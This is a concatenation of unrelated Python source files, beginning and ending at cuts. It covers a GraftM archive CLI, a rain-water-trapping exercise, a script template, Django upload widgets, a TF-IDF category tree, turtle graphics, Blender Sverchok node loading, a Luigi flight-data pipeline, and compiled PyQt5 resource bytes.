            `-.        |                  _.-'
               `-.     |           __..--'
                  `-.  |      __.-'
                     `-|__.--'
            """)
            if self.args.create:
                if self.args.extract:
                    logging.error("Please specify whether to either create or export a GraftM package")
                    exit(1)
                if not self.args.graftm_package:
                    logging.error("Creating a GraftM package archive requires an package to be specified")
                    exit(1)
                if not self.args.archive:
                    logging.error("Creating a GraftM package archive requires an output archive path to be specified")
                    exit(1)

                archive = Archive()
                archive.create(self.args.graftm_package, self.args.archive,
                               force=self.args.force)

            elif self.args.extract:
                archive = Archive()
                archive.extract(self.args.archive, self.args.graftm_package,
                                force=self.args.force)
            else:
                logging.error("Please specify whether to either create or export a GraftM package")
                exit(1)




        else:
            raise Exception("Unexpected subparser name %s" % self.args.subparser_name)

# Rain_Water_Trapping 
def trappedWater(a, size) : 
  
    # left[i] stores height of tallest bar to the to left of it including itself
    left = [0] * size 
  
    # Right [i] stores height of tallest bar to  the to right of it including itself
    right = [0] * size
  
    # Initialize result 
    waterVolume = 0
  
    #  filling left (list/array) 
    left[0] = a[0] 
    for i in range( 1, size): 
        left[i] = max(left[i-1], a[i]) 
  
    #  filling right (list/array) 
    right[size - 1] = a[size - 1] 
    for i in range(size - 2, - 1, - 1): 
        right[i] = max(right[i + 1], a[i]); 
  
    # Calculating volume of the accumulated water element by element 
    
    for i in range(0, size): 
        waterVolume += min(left[i],right[i]) - a[i] 
  
    return waterVolume 
    
# main program
arr =[]
n = int(input())                    #input the number of towers
for i in range(n):
    arr.append(int(input()))        #storing length of each tower in array

print("Maximum water that can be accumulated is ", trappedWater(arr, len(arr))) 
  
#Input:
#12
#0
#1
#0
#2
#1
#0
#1
#3
#2
#1
#2
#1
#Output:
#The maximum water trapped is 6


#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# TODO prog_base.py - A starting template for Python scripts
#
# Copyright 2013 Robert B. Hawkins
#
"""
SYNOPSIS

    TODO prog_base [-h,--help] [-v,--verbose] [--version]

DESCRIPTION

    TODO This describes how to use this script. This docstring
    will be printed by the script if there is an error or
    if the user requests help (-h or --help).

EXAMPLES

    TODO: Show some examples of how to use this script.

EXIT STATUS

    TODO: List exit codes

AUTHOR

    Rob Hawkins <webwords@txhawkins.net>

LICENSE

    This program is free software; you can redistribute it and/or
    modify it under the terms of the GNU General Public License
    as published by the Free Software Foundation; either version 2
    of the License, or (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

VERSION

    1.0.0
"""
__author__    = "Rob Hawkins <webwords@txhawkins.net>"
__version__   = "1.0.0"
__date__      = "2013.12.01"

# Version   Date        Notes
# -------   ----------  -------------------------------------------------------
# 1.0.0     2013.12.01  Starting script template
#

import sys, os, traceback, argparse
import time
import re
#from pexpect import run, spawn

def test ():

    global options, args
    # TODO: Do something more interesting here...
    print 'Hello from the test() function!'

def main ():

    global options, args
    # TODO: Do something more interesting here...
    print 'Hello world!'

if __name__ == '__main__':
    try:
        start_time = time.time()
        #parser = argparse.ArgumentParser(description="This is the program description",  usage=globals()['__doc__'])
        parser = argparse.ArgumentParser(description='This is the program description')
        parser.add_argument('--version', action='version', version='%(prog)s v'+__version__)
        parser.add_argument ('-v', '--verbose', action='store_true', help='produce verbose output')
        parser.add_argument ('-t', '--test', action='store_true', help='run test suite')
        args = parser.parse_args()
        #if len(args) < 1:
        #    parser.error ('missing argument')
        if args.verbose: print time.asctime()
        if args.test: 
            test()
        else:
            main()
        if args.verbose: print time.asctime()
        if args.verbose: print 'TOTAL TIME IN MINUTES:',
        if args.verbose: print (time.time() - start_time) / 60.0
        sys.exit(0)
    except KeyboardInterrupt, e: # Ctrl-C
        raise e
    except SystemExit, e: # sys.exit()
        raise e
    except Exception, e:
        print 'ERROR, UNEXPECTED EXCEPTION'
        print str(e)
        traceback.print_exc()
        os._exit(1)

# -*- coding: utf-8 -*-

from exceptions import DropPage, AbortProcess

# -*- coding: utf-8 -*-
import re
from django.utils.safestring import mark_safe
from django.contrib.admin.widgets import AdminFileWidget
from django.template.defaultfilters import slugify
from django.utils.encoding import smart_text
from unidecode import unidecode
from django.forms.widgets import FILE_INPUT_CONTRADICTION, CheckboxInput, ClearableFileInput


class ImagePreviewWidget(AdminFileWidget):

    template_name = 'admin/attachment/widgets/preview_image_input.html'

    def render(self, name, value, attrs=None, renderer=None):
        output = []
        output.append(super(AdminFileWidget, self).render(name, value, attrs)) # really for AdminFileWidget
        instance = getattr(value, 'instance', None)
        if instance is not None and value:
            output = ['<a target="_blank" href="%s"><img src="%s" alt="%s"/></a>' % \
                (instance.image.url, instance.thumb.url, instance.image)] + output
        return mark_safe(u''.join(output))

    def value_from_datadict(self, data, files, name):

        for key, file in files.items():
            filename = file._get_name()
            ext = u""
            if '.' in filename:
                ext = u"." + filename.rpartition('.')[2]
            filename = filename.rpartition('.')[0]
            filename = re.sub(r'[_.,:;@#$%^&?*|()\[\]]', '-', filename)
            filename = slugify(unidecode(smart_text(filename))) + ext
            files[key]._set_name(filename)

        upload = super(ImagePreviewWidget, self).value_from_datadict(data, files, name)
        if not self.is_required and CheckboxInput().value_from_datadict(
                data, files, self.clear_checkbox_name(name)):

            if upload:
                # If the user contradicts themselves (uploads a new file AND
                # checks the "clear" checkbox), we return a unique marker
                # object that FileField will turn into a ValidationError.
                return FILE_INPUT_CONTRADICTION
            # False signals to clear any existing value, as opposed to just None
            return False
        return upload


class ImagePreviewWidgetHorizontal(ImagePreviewWidget):

    template_name = 'admin/attachment/widgets/preview_image_input_horizontal.html'


class ImagePreviewWidgetVertical(ImagePreviewWidget):

    template_name = 'admin/attachment/widgets/preview_image_input_vertical.html'


class FileWidget(ClearableFileInput):

    def value_from_datadict(self, data, files, name):
        for key, file in files.items():
            filename = file._get_name()
            ext = u""
            if '.' in filename:
                ext = u"." + filename.rpartition('.')[2]
            filename = filename.rpartition('.')[0]
            filename = re.sub(r'[_.,:;@#$%^&?*|()\[\]]', '-', filename)
            filename = slugify(unidecode(smart_text(filename))) + ext
            files[key]._set_name(filename)

        return files.get(name, None)

import json

from collections import (
    Counter,
    defaultdict as deft
)

from copy import deepcopy as cp

# from cPickle import (
#     dump as to_pickle,
#     load as from_pickle
# )

from StringIO import StringIO

from TfIdfMatrix import TfIdfMatrix

from Tools import from_csv


class CategoryTree:
    
    def __init__(self, categories_by_concept, terms,
                 categories, tfidf, max_depth=5, min_df=20
    ):
        self.min_df = min_df
        self.path_categories_by_concept = categories_by_concept
        self.path_categories = categories
        self.path_terms = terms
        self.max_depth = max_depth
        self.observed_category = deft(bool)
        self.id_by_concept = dict([])
        self.concept_by_id = dict([])
        self.term_is_category = deft(bool)
        self.parents_by_category = dict([])
        self.parents_by_concept = deft(list)
        self.id_by_term = dict([])
        self.term_by_id = dict([])
        self.has_parents = deft(bool)
        self.tfidf = tfidf
        self.pulling = set([])
        self.vector_by_category = deft(Counter)
        self.contributors_by_category = deft(set)
        self.projected = Counter()

    def build(self):
        for i, c in enumerate(self.concept_by_id.values()):
            self(c)
            if not i % 100:
                t = float(len(self.concept_by_id.keys()))
                print i, int(t), round(i / t, 2)
#             if i >= 5000:
#                 break
    
    def dump(self):

        # Simulate a file with StringIO
        out = open('vector.dump.txt', 'wb')

        for i, (_id, projections) in enumerate(self.projected.items()):
        
            if not i % 100:
                print i, len(self.projected.keys())

            if not projections:
                continue

            features = [
                (self.tfidf.word_by_id[wid], round(weight, 4))
                for wid, weight in self.vector_by_category[_id].most_common()
                if round(weight, 4)
            ]
            record = (
                _id,
                self.concept_by_id[_id],
                features
            ) 
            out.write('%s\n' % str(record))

        out.close()


    def __call__(self, category):
        self.pulling = set([])
        return self.__pull(None, 0, category, dict([]))

    def __get_parents(self, _id):
        parents = []
        name = self.concept_by_id[_id]
        if (
            not self.observed_category[name] or
            not self.observed_category[_id] or
            not self.has_parents[_id]
        ):
            return []
        else:
            for i in self.parents_by_category[_id]:
                if not self.observed_category[i]:
                    continue
                _name = self.concept_by_id[i]
                parents.append(_name)
            return set(parents) - self.pulling


    def __pull(self, vector, depth, category, tree):
        _id = self.id_by_concept[category]
        if not self.pulling:
#             print
#             print
#             print category, _id
#             print [self.term_by_id[x] for x in self.contributors_by_category[_id]]
#             print self.vector_by_category[_id].most_common(20)
            vector = self.vector_by_category[_id]

        if not self.observed_category[category]:
            return dict([])

        parents = self.__get_parents(_id)
        if not parents or depth >= self.max_depth:
            tree[category] = dict([])
        else:
            subtree = dict([])
            self.pulling.update(parents)
            for parent in parents:
                subtree = self.__pull(vector, depth + 1, parent, subtree)
            tree[category] = subtree

        self.__project(vector, tree)

        return tree

    
    def __project(self, vector, tree):
        if not tree.keys():
            return
        else:
            for key, subtree in tree.items():
                _id = self.id_by_concept[key]
                self.projected[_id] += 1
                self.__add2vec(vector, _id)
                self.__project(vector, subtree)

    def __add2vec(self, vector, _id):
#         for w, weight in vector.items():
#             __id = self.tfidf.id_by_word[w]
        for __id, weight in vector.items():
            self.vector_by_category[_id][__id] += weight

    def load(self):
        self.__load_terms()
        self.__load_categories()
        self.__load_assignments()

    def __load_categories(self):
        for concept, _id in from_csv(self.path_categories):
            _id = int(_id)
            self.id_by_concept[concept] = _id
            self.concept_by_id[_id] = concept
            self.observed_category[_id] = True
            self.observed_category[concept] = True
#             print concept, _id, len(self.id_by_concept.keys())
#         exit()
    
    def __load_terms(self):
        for term, _id in from_csv(self.path_terms):
            _id = int(_id)
            self.term_by_id[_id] = term
            self.id_by_term[term] = _id
            if not term.startswith('Category:'):
                continue
            self.term_is_category[term] = True
            self.term_is_category[_id] = True

    def __load_assignments(self):
        for row in from_csv(self.path_categories_by_concept):
            ints = [int(field) for field in row]
            term_id = ints[0]
            term = self.term_by_id[term_id]
            if self.term_is_category[term_id] and \
            self.observed_category[term]:
                term = self.term_by_id[term_id]
                cat_id = self.id_by_concept[term]
                assignments = [i for i in ints[1:] if self.observed_category[i]]
                self.parents_by_category[cat_id] = assignments
                self.has_parents[cat_id] = True
            else:
                vector = self.tfidf.content(term_id)
                assignments = [i for i in ints[1:] if self.observed_category[i]]
                self.parents_by_concept[term_id] = assignments
                for a_id in assignments:
                    for w, weight in vector:
                        if self.tfidf.df[w] < self.min_df:
                            continue
                        #print term, term_id, self.concept_by_id[a_id], w, self.vector_by_category[a_id][w], '\t+%f' % weight
                        self.vector_by_category[a_id][w] += weight
                        self.contributors_by_category[a_id].update([term_id])



if __name__ == '__main__':
    
    import random
    from random import shuffle as randomize
    
    
    tfidf = TfIdfMatrix()
    tfidf.load_features('bkp.big.out/vector.term.csv')
    tfidf.load_distribution('bkp.big.out/vector.index.csv')
#     tfidf.load_features('vector.term.csv')
#     tfidf.load_distribution('vector.index.csv')

    ctree = CategoryTree(
        'bkp.big.out/category.index.csv',
        'bkp.big.out/term.csv',
        'bkp.big.out/category.csv',
#         'category.index.csv',
#         'term.csv',
#         'category.csv',
        tfidf,
        max_depth=1
    )
    ctree.load()
    ctree.build()
    ctree.dump()
    

"""
File: foursquares.py

Draws squares in the corners of a turtle window.
One square is black, another is gray, and the
remaining two are in random colors.
"""

from turtlegraphics import Turtle
import random

def drawSquare(turtle, x, y, length):
    turtle.up()
    turtle.move(x, y)
    turtle.setDirection(270)
    turtle.down()
    for count in xrange(4):
        turtle.move(length)
        turtle.turn(90)

def main():
    turtle = Turtle()
    #turtle.setWidth(1)
    # Length of square
    length = 40
    # Relative distances to corners from origin
    width = turtle.getWidth() / 2
    height = turtle.getHeight() / 2
    # Black
    turtle.setColor(0, 0, 0)
    # Upper left corner
    drawSquare(turtle, -width, height, length)
    # Gray
    turtle.setColor(127, 127, 127)
    # Lower left corner
    drawSquare(turtle, -width, length - height, length)
    # First random color
    turtle.setColor(random.randint(0, 255),
                    random.randint(0, 255),
                    random.randint(0, 255))
    # Upper right corner
    drawSquare(turtle, width - length, height, length)
    # Second random color
    turtle.setColor(random.randint(0, 255),
                    random.randint(0, 255),
                    random.randint(0, 255))
    # Lower right corner
    drawSquare(turtle, width - length,
               length - height, length)
   
main()

# ##### BEGIN GPL LICENSE BLOCK #####
#
#  This program is free software; you can redistribute it and/or
#  modify it under the terms of the GNU General Public License
#  as published by the Free Software Foundation; either version 2
#  of the License, or (at your option) any later version.
#
#  This program is distributed in the hope that it will be useful,
#  but WITHOUT ANY WARRANTY; without even the implied warranty of
#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#  GNU General Public License for more details.
#
#  You should have received a copy of the GNU General Public License
#  along with this program; if not, write to the Free Software Foundation,
#  Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####

old_bl_idnames = {
     'CentersPolsNode' : "centers",
#    'BakeryNode' : "bakery",
    'CircleNode' : "circle",
    'ListItemNode' : "list_item",
    'GenRangeNode' : "range",
    'GenSeriesNode' : "series",
#    'Test1Node' : "test",
#    'Test2Node' : "test",
#    'ToolsNode' : "tools",
    'SvReRouteNode': "reroute",
    'VoronoiNode': "voronoi",
    'ViewerNode': "viewer",
    'EvalKnievalNode': "eval_knieval",
    'FormulaNode': 'formula',
}

# we should add some functions to load things there
import importlib
import inspect
import traceback

import bpy

from sverchok.node_tree import SverchCustomTreeNode
imported_mods = {}

def is_old(node_info):
    '''
    Check if node or node.bl_idname is among
    the old nodes
    '''
    if isinstance(node_info, str):
        # assumes bl_idname
        return node_info in old_bl_idnames
    elif isinstance(node_info, bpy.types.Node):
        return node_info.bl_idname in old_bl_idnames
    else:
        return False

def scan_for_old(ng):
    nodes = [n for n in ng.nodes if n.bl_idname in old_bl_idnames]
    for node in nodes:
        mark_old(node)
    
def mark_old(node):
    if node.parent and node.parent.label == "Deprecated node!":
        return
    ng = node.id_data
    frame = ng.nodes.new("NodeFrame")
    if node.parent:
        frame.parent = node.parent
    node.parent = frame
    frame.label = "Deprecated node!"
    frame.use_custom_color = True
    frame.color = (.8, 0, 0)
    frame.shrink = True

def reload_old(ng=False):
    if ng:
        bl_idnames = {n.bl_idname for n in ng.nodes if n.bl_idname in old_bl_idnames} 
        for bl_id in bl_idnames:
            mod = register_old(bl_id)
            if mod:
                importlib.reload(mod)
            else:
                print("Couldn't reload {}".format(bl_id))
    else:
        for ng in bpy.data.node_groups:
            reload_old(ng)
            #if ng.bl_idname in { 'SverchCustomTreeType', 'SverchGroupTreeType'}:
            #    reload_old(ng)
    
def load_old(ng):
    
    """
    This approach didn't work, bl_idname of undefined node isn't as I expected
    bl_idnames = {n.bl_idname for n in ng.nodes} 
    old_bl_ids = bl_idnames.intersection(old_bl_idnames)
    if old_bl_ids:
    
    """
    not_reged_nodes = list(n for n in ng.nodes if not n.is_registered_node_type())
    if not_reged_nodes:
        for bl_id in old_bl_idnames:
            register_old(bl_id)
            nodes = [n for n in ng.nodes if n.bl_idname == bl_id]
            if nodes:
                for node in nodes:
                    mark_old(node)
                not_reged_nodes = list(n for n in ng.nodes if not n.is_registered_node_type())
                node_count = len(not_reged_nodes)
                print("Loaded {}. {} nodes are left unregisted.".format(bl_id, node_count))
                if node_count == 0:
                    return
            else: # didn't help remove
                unregister_old(bl_id)
    
def register_old(bl_id):
    if bl_id in old_bl_idnames:
        mod = importlib.import_module(".{}".format(old_bl_idnames[bl_id]), __name__)
        res = inspect.getmembers(mod)
        for name, cls in res:
            if inspect.isclass(cls):
                if issubclass(cls, bpy.types.Node) and cls.bl_idname == bl_id:
                    if bl_id not in imported_mods:
                        try:
                            mod.register()
                        except:
                            traceback.print_exc()
                        imported_mods[bl_id] = mod
                        return mod
                    
    print("Cannot find {} among old nodes".format(bl_id))
    return None

def unregister_old(bl_id):
    global imported_mods
    mod = imported_mods.get(bl_id)
    if mod:
        #print("Unloaded old node type {}".format(bl_id)) 
        mod.unregister()
        del imported_mods[bl_id]
         
def unregister():
    global imported_mods
    print(imported_mods)
    for mod in imported_mods.values():
        mod.unregister()
    imported_mods = {}

# coding: utf-8
"""
rita Pipeline 

.. module:: rita

   :synopsis: rita pipeline

.. moduleauthor:: Adolfo De Unánue <nanounanue@gmail.com>
"""

import os

import subprocess

from pathlib import Path

import boto3
import zipfile
import io

import csv
import datetime

import luigi
import luigi.s3

import pandas as pd

import sqlalchemy

from contextlib import closing

import requests

import re

from bs4 import BeautifulSoup

## Variables de ambiente
from dotenv import load_dotenv, find_dotenv
load_dotenv(find_dotenv())

## Obtenemos las llaves de AWS
AWS_ACCESS_KEY_ID =  os.environ.get('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')

## Logging
import rita.config_ini

import logging

logger = logging.getLogger("rita.pipeline")


import rita.pipelines.utils

import rita.pipelines.common
from rita.pipelines.common.tasks import DockerTask

class ritaPipeline(luigi.WrapperTask):
    """
    Task principal para el pipeline 
    """

    def requires(self):
        yield DownloadRITACatalogs()
        yield DownloadRITAData()


class DownloadRITACatalogs(luigi.WrapperTask):
    """
    """

    def requires(self):
        baseurl = "https://www.transtats.bts.gov"
        url = "https://www.transtats.bts.gov/DL_SelectFields.asp?Table_ID=236"
        page = requests.get(url)

        soup = BeautifulSoup(page.content, "lxml")
        for link in soup.find_all('a', href=re.compile('Download_Lookup')):
            catalog_name = link.get('href').split('=L_')[-1]
            catalog_url = '{}/{}'.format(baseurl, link.get('href'))
            yield DownloadCatalog(catalog_name=catalog_name, catalog_url=catalog_url)

class DownloadCatalog(luigi.Task):
    """
    """

    catalog_url = luigi.Parameter()
    catalog_name = luigi.Parameter()

    root_path =  luigi.Parameter()

    def run(self):
        logger.debug("Guardando en {} el catálogo {}".format(self.output().path, self.catalog_name))

        with closing(requests.get(self.catalog_url, stream= True)) as response, \
             self.output().open('w') as output_file:
            for chunk in response.iter_lines(chunk_size=1024*8):
                if chunk:
                    output_file.write(chunk.decode('utf-8') + '\n')


    def output(self):
        output_path = '{}/catalogs/{}.csv'.format(self.root_path,
                                                  self.catalog_name)
        return luigi.s3.S3Target(path=output_path)


class DownloadRITAData(luigi.WrapperTask):
    """
    """
    start_year=luigi.IntParameter()

    def requires(self):
        today = datetime.date.today() + datetime.timedelta(days=-90)

        max_year = today.year
        max_month = today.month

        years = range(self.start_year, max_year)

        logger.info("Descargando datos de los años {}".format(years))

        for año in years:
            if año != max_year:
                months = range(1,13)
            else:
                month = range(1, max_month+1)
            for mes in months:
                yield DownloadRITAMonthlyData(year=año, month=mes)


class DownloadRITAMonthlyData(DockerTask):
    """
    """
    year = luigi.IntParameter()
    month = luigi.IntParameter()

    root_path = luigi.Parameter()
    raw_path = luigi.Parameter()

    @property
    def cmd(self):
        return '''
               docker run --rm --env AWS_ACCESS_KEY_ID={} --env AWS_SECRET_ACCESS_KEY={} rita/download-rita --year {} --month {} --data_path {}/{} 
        '''.format(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, self.year, self.month, self.root_path, self.raw_path)

    def output(self):
        return luigi.s3.S3Target(path='{}/{}/{}-{}.zip'.format(self.root_path,
                                                               self.raw_path,
                                                               str(self.month).zfill(2),
                                                               self.year))



class ExtractColumns(luigi.Task):
    """
    """

    task_name = "extract-columns"

    year = luigi.IntParameter()
    month = luigi.IntParameter()

    root_path = luigi.Parameter()
    bucket = luigi.Parameter()
    etl_path = luigi.Parameter()

    def requires(self):
        return DownloadRITA(year=self.year, month=self.month)

    def run(self):

        s3 = boto3.resource('s3')

        bucket = s3.Bucket(self.bucket)

        input_path = Path(self.input().path)

        obj = bucket.Object(str(input_path.relative_to('s3://{}'.format(self.bucket))))

        df = None

        with io.BytesIO(obj.get()["Body"].read()) as input_file:
            input_file.seek(0)
            with zipfile.ZipFile(input_file, mode='r') as zip_file:
                for subfile in zip_file.namelist():
                    with zip_file.open(subfile) as file:
                        df = pd.read_csv(file)

        with self.output().open('w') as output_file:
            output_file.write(df.loc[:, 'YEAR':'DIV_AIRPORT_LANDINGS'].to_csv(None,
                                                                              sep="|",
                                                                              header=True,
                                                                              index=False,
                                                                              encoding="utf-8",
                                                                              quoting=csv.QUOTE_ALL))

    def output(self):
        return luigi.s3.S3Target('{}/{}/{}/YEAR={}/{}.psv'.format(self.root_path,
                                                                  self.etl_path,
                                                                  self.task_name,
                                                                  self.year,
                                                                  str(self.month).zfill(2)))


class RTask(luigi.Task):

    root_path = luigi.Parameter()

    def requires(self):
        return RawData()

    def run(self):
        cmd = '''
              docker run --rm -v rita_store:/rita/data  rita/test-r 
        '''

        logger.debug(cmd)

        out = subprocess.check_output(cmd, shell=True)

        logger.debug(out)

    def output(self):
        return luigi.LocalTarget(os.path.join(os.getcwd(), "data", "hola_mundo_desde_R.psv"))


class PythonTask(luigi.Task):

    def requires(self):
        return RTask()

    def run(self):
        cmd = '''
              docker run --rm -v rita_store:/rita/data  rita/test-python --inputfile {} --outputfile {}
        '''.format(os.path.join("/rita/data", os.path.basename(self.input().path)),
                   os.path.join("/rita/data", os.path.basename(self.output().path)))

        logger.debug(cmd)

        out = subprocess.call(cmd, shell=True)

        logger.debug(out)

    def output(self):
        return luigi.LocalTarget(os.path.join(os.getcwd(), "data", "hola_mundo_desde_python.json"))





# -*- coding: utf-8 -*-

# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.9.2)
#
# WARNING! All changes made in this file will be lost!

from PyQt5 import QtCore

qt_resource_data = b"\
\x00\x00\x07\x27\
\x00\
\x00\x1a\x8b\x78\x9c\xe5\x58\xdd\x8f\xdb\x36\x12\x7f\xdf\xbf\x82\
\x55\x1f\xd2\x43\x2d\x8a\xa4\x3e\x28\x69\xed\x2d\xd0\xa4\x69\xf2\
\x50\xa0\x68\xd2\x14\xb8\x37\xad\x44\xdb\xba\xe8\xc3\x90\xe4\xb5\
\x9d\xbf\xfe\x86\xd4\x07\x29\xdb\x1b\x5f\x0e\xc5\x3d\xdc\x0a\xbb\
\x58\x71\x38\xc3\x99\xe1\x0c\x7f\x3f\x6a\x97\x3f\x1d\xcb\x02\x3d\
\x89\xa6\xcd\xeb\x6a\x65\x51\x4c\x2c\x24\xaa\xb4\xce\xf2\x6a\xb3\
\xb2\xfe\xfc\xf8\xd6\x0e\x2d\xd4\x76\x49\x95\x25\x45\x5d\x89\x95\
\x55\xd5\xd6\x4f\x0f\x77\xcb\xef\x6c\x1b\xbd\x6e\x44\xd2\x89\x0c\
\x1d\xf2\x6e\x8b\xde\x57\x9f\xdb\x34\xd9\x09\xf4\xc3\xb6\xeb\x76\
\xb1\xe3\x1c\x0e\x07\x9c\x0f\x42\x5c\x37\x1b\xe7\x1f\xc8\xb6\x1f\
\xee\xee\x96\xed\xd3\xe6\x0e\x21\x04\x7e\xab\x36\xce\xd2\x95\x35\
\x18\xec\xf6\x4d\xa1\x14\xb3\xd4\x11\x85\x28\x45\xd5\xb5\x0e\xc5\
\xd4\xb1\xb4\x7a\xaa\xd5\x53\xe9\x3d\x7f\x12\x69\x5d\x96\x75\xd5\
\x2a\xcb\xaa\xfd\xde\x50\x6e\xb2\xf5\xa4\x2d\xa3\x39\xb8\x4a\x89\
\x46\x51\xe4\x10\xe6\x30\x66\x83\x86\xdd\x9e\xaa\x2e\x39\xda\x73\
\x53\x88\xf1\x9a\x29\x23\x84\x38\x30\xa7\x35\xff\x33\xad\xb8\x85\
\x0d\xdd\xc1\xef\xa4\x3e\x0a\x70\x5b\xef\x9b\x54\xac\xc1\x4e\xe0\
\x4a\x74\xce\x9b\x8f\x6f\xa6\x49\x9b\xe0\xac\xcb\x8c\x65\xc6\xfd\
\x9c\x79\x9d\x6d\x72\x95\x94\xa2\xdd\x25\xa9\x68\x9d\x51\xae\xec\
\x0f\x79\xd6\x6d\xa1\xbe\xc1\xee\xa8\xc6\x5b\x91\x6f\xb6\x9d\x21\
\x78\xca\xc5\xe1\xe7\xfa\xb8\xb2\x08\x22\x88\x06\xf0\xd3\x8b\x75\
\x67\x50\x25\xc8\xb3\x95\xf5\xe1\xd3\xaf\x7f\xd4\x75\xd7\x8f\x07\
\x2f\xf1\xa4\x49\x70\xc4\x30\x45\x8d\x9a\x1e\x53\x89\xb3\x3a\x95\
\xb1\xad\xac\x4c\xf4\xdd\x85\xc7\x1d\x9a\x56\x10\xc7\x5d\xdd\x74\
\xf6\x3a\x2f\x44\xaf\xea\x6c\xeb\x52\x38\xff\xaa\x85\xf3\xeb\xfb\
\x8f\xce\xbe\xd9\x3a\x59\xd2\x25\x4e\x9e\x42\xbd\x1d\x73\x1d\xbc\
\xab\xae\xaf\x75\xcc\x76\xb0\xe7\x91\x87\xc3\x10\xaa\x1e\x5d\xd5\
\x39\x9d\xe9\x3c\x80\xd2\x72\x8a\x5b\x46\x92\xc9\xcd\x91\xa6\x7d\
\xfa\x8f\x49\xdb\x6f\x2a\x42\xbb\x64\x03\x61\x14\x75\xb3\xb2\xbe\
\x5f\xab\x67\x98\x78\xac\x9b\x4c\x34\xe3\x54\xa0\x9e\xd9\x54\x0d\
\x45\xca\xbb\x53\x7f\xe4\x86\xb5\xc7\xc0\xe4\xaa\xd3\x3c\xb9\x3e\
\xdf\x6e\x93\xac\x3e\xac\x2c\x76\x3e\xf9\xa5\xae\x4b\x59\xd7\x73\
\x79\x0a\xb5\x65\x38\xf4\x5c\xee\x5f\x4c\x81\x1b\x06\x7e\x02\x76\
\x31\x05\x65\xdb\xcb\x93\x68\xef\xab\xbc\x83\x6e\x1f\xba\xc5\x34\
\xde\x37\x8d\x54\x28\x92\x93\x80\x5c\xd5\x9f\x31\xa8\x76\x5b\x1f\
\x36\x8d\xdc\xb3\x75\x52\x4c\x9b\x36\x99\x1e\xf2\x0a\x72\xb0\xc7\
\xde\x8c\xd8\x45\xa6\x83\xc6\xd4\xad\xd4\xa3\xcf\xa8\xc8\xce\x7d\
\x66\xea\xf4\xfc\x54\x99\x1c\xf3\x32\xff\x22\x20\xc2\x8b\x85\x65\
\xe0\xf6\xe3\xa3\x3c\x13\x5d\xb3\x17\x66\x4a\xfb\x3c\x13\xed\x98\
\x14\x72\x54\xc7\x64\x62\xdd\xea\x1e\x91\x23\xd7\x1d\xe7\x4a\xd1\
\x25\xb2\x75\xf5\xfc\x28\x71\x03\xd5\x6f\xa0\x03\x58\x14\xff\xf1\
\xe6\x6d\x3f\x82\x71\x9a\xc6\x7f\xd5\xcd\xe7\x61\x08\x8f\x54\x48\
\x1e\xeb\x3d\xec\x83\xf5\x30\x89\x97\x59\x1a\x03\x7a\x94\x49\xf7\
\x90\x97\xd0\x17\x12\x78\x7e\x04\xb4\x58\x3a\x7a\x62\xa6\xdc\x9d\
\x76\x42\x2f\xda\x2f\xdb\x88\x1e\x86\xae\x62\x71\x96\x96\xb9\x34\
\x72\x3e\x74\x79\x51\xbc\x97\x4e\x86\xbc\x8c\x45\xf3\xae\x10\x5a\
\xb8\x74\x86\xe8\x87\xdc\x1c\x23\xb9\xa5\x33\xe6\xae\x46\x1b\xbd\
\x27\xaa\x75\xae\x94\xa1\xde\xef\xca\x3a\x13\x83\xc2\xf9\x7c\x91\
\x3c\x8a\x62\x65\xfd\xf2\x28\x2a\x81\xe8\xb4\x9b\x22\xed\xc6\x08\
\xe5\xda\x72\xcc\xc7\xb6\x34\xe0\x10\xd3\x70\x3a\x0f\x1a\x15\x01\
\xbf\x98\x96\x1a\xad\x85\x10\x34\x13\x9f\x06\x6d\x77\x2a\x20\xae\
\xb6\x6b\xea\xcf\xa2\xef\xe3\x98\x60\x9f\x7b\xbe\x47\xf8\x54\x7d\
\x67\x33\xcb\xf4\x56\x62\xd9\xd9\x21\xba\x9e\x29\x1b\x33\xdd\x8c\
\xc1\x24\x4d\x9e\xd8\x83\x0e\x25\xf4\x3c\xc8\x75\x0d\x87\x54\xbd\
\xc7\x95\x6c\x8b\xe2\x5e\x49\x9e\xa4\x59\xd5\xcd\x64\x07\xb5\x0d\
\x71\x40\xc8\xfd\x60\xd5\x88\x2e\xdd\xce\x74\x5a\x38\x35\x71\xb8\
\x3b\xde\x17\x79\x25\x86\x03\x1a\x53\xcc\xfc\x7e\x7a\x9d\x94\x79\
\x71\x8a\x5f\x7d\x50\x7d\x85\x5e\x43\x9a\xe8\xf7\xa6\x7e\x75\x6f\
\x8f\xe9\xd8\xfd\x32\x3b\x91\xe6\xeb\x3c\x05\x2a\xaf\xab\x0b\x75\
\xf4\x41\x94\xb9\xfd\x73\x5d\x64\xaf\xee\x0b\xd1\x75\xa2\xb1\x25\
\xb9\x01\xea\xc7\x04\x5c\x1f\x00\x49\x67\x02\xa0\x8e\x22\x1e\x80\
\x58\x0d\xec\x01\x46\x63\x7a\xdf\x17\x09\x72\xa8\x84\x65\x76\x46\
\x27\x8e\x9d\x4f\xa7\x13\xb5\xdc\x25\xdd\x56\x9f\x0f\x50\xf8\x0d\
\x11\xec\xba\x9e\x0b\x0f\x5d\x04\x58\x02\x28\x7a\x87\x3c\x1c\x04\
\x1e\xd0\x45\x88\x3e\x21\x1f\x53\x2f\x92\x42\x17\xbb\x91\x0f\x48\
\xef\x83\x10\xfa\x80\x11\x1a\x04\x21\x87\x09\x86\x19\x8d\x24\x07\
\xa0\xd7\x88\x62\xee\x33\xc9\x34\x0b\x82\x43\xa2\x54\x80\x6e\x31\
\x0b\x03\xe9\x02\x84\x51\x10\x4a\xa1\x2f\x97\xe0\x81\xd4\xe4\x0b\
\x60\x89\x28\x0c\x5d\x57\xae\xcc\x30\x09\x95\x06\x2c\x0c\x8b\x45\
\x44\xda\x99\x61\xe8\x78\xd1\x3f\x2d\x9d\xcb\x7f\xdd\x08\xd1\xcd\
